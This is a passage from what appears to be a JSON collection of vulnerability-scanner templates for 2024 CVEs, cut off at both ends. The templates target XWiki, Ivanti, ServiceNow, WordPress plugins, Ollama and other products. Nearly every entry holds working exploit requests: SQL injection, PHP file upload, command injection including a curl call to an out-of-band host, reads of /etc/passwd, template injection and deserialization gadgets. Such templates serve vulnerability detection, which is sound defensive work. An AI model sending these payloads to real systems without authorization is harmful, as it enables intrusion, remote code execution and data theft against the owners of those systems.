image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory&register_first_name={{firstname}}&register_last_name={{lastname}}&xwikiname={{user}}&register_password={{pass}}&register2_password={{pass}}&register_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-4257","info":{"name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>\u4e34\u5e8a\u6d4f\u89c8</title>\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38289","info":{"name":"TurboMeeting - Boolean-based SQL Injection","severity":"critical"},"requests":[{"raw":["POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n","POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["<__Status__>SUCCEED</__Status__>"]},{"type":"word","part":"body_2","words":["<__Status__>FAILED</__Status__>"]}]}]},{"id":"CVE-2024-33575","info":{"name":"User Meta WP Plugin < 3.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"um-debug<br/>\")"],"condition":"and"}]}]},{"id":"CVE-2024-3552","info":{"name":"Web Directory Free < 1.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/web-directory-free"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","regex('^\\[\\]$', body)"],"condition":"and"}]}]},{"id":"CVE-2024-7188","info":{"name":"Bylancer Quicklancer 2.4 G - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 30s\nGET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type,\"text/html\")","contains_all(body,\"og:site_name\",\"og:locale\",\"range2\")"],"condition":"and"}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-3495","info":{"name":"Wordpress Country State City Dropdown <=2.7.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+-\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"nonce\":\"(\\S*)\""],"internal":true}]}]},{"id":"CVE-2024-27564","info":{"name":"ChatGPT\u4e2a\u4eba\u4e13\u7528\u7248 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd","{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"image/jpeg\")","regex('root:.*:0:0:', body)"],"condition":"and"},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"image/jpeg\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1698","info":{"name":"NotificationX <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-json/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"nx_id\": \"1\",\"type\": \"clicks`=1 and 1=sleep(5)-- -\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"{\\\"success\\\":true}\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare TLR-2005KSH  - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6366","info":{"name":"User Profile Builder < 3.11.8 - File Upload","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/plugins/profile-builder\")"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"wppb_upload\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"meta_name\"\n\n{{filename}}.gif\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"_wpnonce\"\n\ne8\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.gif\"\nContent-Type: image/jpeg\n\nGIF89a\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"id\"","\"uploadedTo\""],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5217","info":{"name":"ServiceNow - Incomplete Input Validation","severity":"critical"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j=\"jelly:core\"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File(\"\").getAbsolutePath();z=z.substring(0,z.lastIndexOf(\"/\"));u=new+SecurelyAccess(z.concat(\"/co..nf/glide.db.properties\")).getBufferedReader();s=\"\";while((q=u.readLine())!==null)s=s.concat(q,\"\\n\");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["glide.db.user"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5827","info":{"name":"Vanna - SQL injection","severity":"critical"},"requests":[{"raw":["POST /api/v0/train HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"sql\":\"SELECT pg_read_file('/etc/passwd', 0, 1000);\"}\n"],"matchers":[{"type":"word","words":["id\":"],"internal":true}]},{"raw":["GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27199","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/../admin/diagnostic.jsp","{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp","{{BaseURL}}/update/../admin/diagnostic.jsp"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34982","info":{"name":"LyLme-Spage - Arbitary File Upload","severity":"high"},"requests":[{"raw":["POST /include/file.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------575673989461736\n\n-----------------------------575673989461736\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: image/png\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------575673989461736--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"code\":","\"msg\":","php\"}"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","part":"body","group":1,"regex":["\"url\":\"([/a-z_0-9.]+)\""],"internal":true}]},{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{{string}}\" )","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33610","info":{"name":"Sharp Multifunction Printers - Cookie Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sessionlist.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No.","User","From","Last login","Last access","Language ID","Cookie"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["<var name='uuid'><string>(.*)</string>"],"internal":true}]}]},{"id":"CVE-2024-3922","info":{"name":"Dokan Pro <= 3.10.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Dokan product"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: {{Hostname}}\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302"],"condition":"and"}]}]},{"id":"CVE-2024-2879","info":{"name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"],"matchers":[{"type":"word","internal":true,"words":[".ls-clearfix:before"]}]},{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"<script>\")"],"condition":"and"}]}]},{"id":"CVE-2024-6289","info":{"name":"WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"WPS Hide Login\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?gf_page={{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), \"wp-login.php\")","contains(header,\"%2F%3Fgf_page%3D{{string}}&reauth=1\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-7120","info":{"name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","severity":"medium"},"requests":[{"raw":["GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\nHost: {{Hostname}}\n","GET /tmp/info.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32709","info":{"name":"WP-Recall <= 16.26.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-22320","info":{"name":"IBM Operational Decision Manager - Java Deserialization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["javax.servlet.ServletException"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open 